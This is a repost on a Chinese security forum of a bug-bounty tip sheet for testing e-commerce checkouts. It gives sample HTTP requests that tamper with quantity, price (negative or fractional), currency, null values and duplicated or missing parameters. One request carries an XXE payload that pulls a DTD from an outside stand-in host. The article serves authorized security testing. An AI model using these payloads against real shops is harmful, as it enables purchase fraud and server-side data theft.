安全矩阵

 找回密码
 立即注册
搜索
查看: 828|回复: 0

漏洞赏金猎人系列-测试电商类相关功能步骤和Tips-I

[复制链接]

249

主题

299

帖子

1391

积分

金牌会员

Rank: 6Rank: 6

积分
1391
发表于 2022-11-11 21:03:03 | 显示全部楼层 |阅读模式
原文链接:漏洞赏金猎人系列-测试电商类相关功能步骤和Tips-I


漏洞赏金猎人系列-测试电商类相关功能步骤和Tips-I

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

前言

电商类的网站国内算是很多了,这里主要总结下相关业务功能的测试步骤以及技巧

正文第一种方法

尝试控制数量,例如,原来的数量是1件,试着把它改成3件,可以免费得到两件物品,纯业务逻辑层面的漏洞

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

Quantity=3&price=10&currency=dollar&token=************& add=egy
第二种方法

尝试操纵篡改价格,例如原价格是10,试着将其改变为-10或分数值,例如0.10,使商品更便宜

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

Quantity=1&price=-10&currency=dollar&token=************& add=egy
第三种方法

尝试篡改货币种类,例如,原来的货币是美元,试着把它换成印度卢比,让商品更便宜

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

Quantity=1&price=10&currency=INR&token=************& add=egy
第四种方法

尝试在参数的所有字段值中使用负数、零、NaN、null或大量00000,例如Quantity=0000或Quantity=null,可能会发生逻辑问题

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

Quantity=null&price=10&currency=dollar&token=************& add=egy
第五种方法

尝试使用参数污染技术,如Quantity=1&Quantity=2或Quantity=[]获得免费物品

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

Quantity=1&Quantity=2&price=10&currency=dollar& token=************&add=egy
第六种方法

尝试省略参数,例如删除参数及其值或只删除值或尝试将其替换为Null,以引起逻辑问题

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

Quantity=1(这里的参数需要删除)&price=10&currency=dollar&token=************& add=egy
第七种方法

尝试更改内容类型头文件为Content - Type: application/xml,使用XXE有效负载,例如

<!DOCTYPE test [<!ENTITY xxe SYSTEM "http://me.com/xxe.dtd" >]>


POST /buying-something HTTP/1.1
Host: www.company.com
Content-Type: application/xml;charset=UTF–8
Content-Length: Number

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "http://me.com/xxe.dtd">]> <root>
<Quantity>&xxe;</Quantity>
<price>10</price>
<add>egy</add>
<token>******</token>
</root>
参考

https://hackerone.com/reports/364843

https://hackerone.com/reports/403783

https://hackerone.com/reports/771694

https://hackerone.com/reports/927661

https://hackerone.com/reports/422331

https://twitter.com/sunilyedla2/status/1338746485416972289

https://darkweblinks.org/2018/08/10/xxe-for-fun-and-profit-converting-json-request-to-xml/



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 06:37 , Processed in 0.012402 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表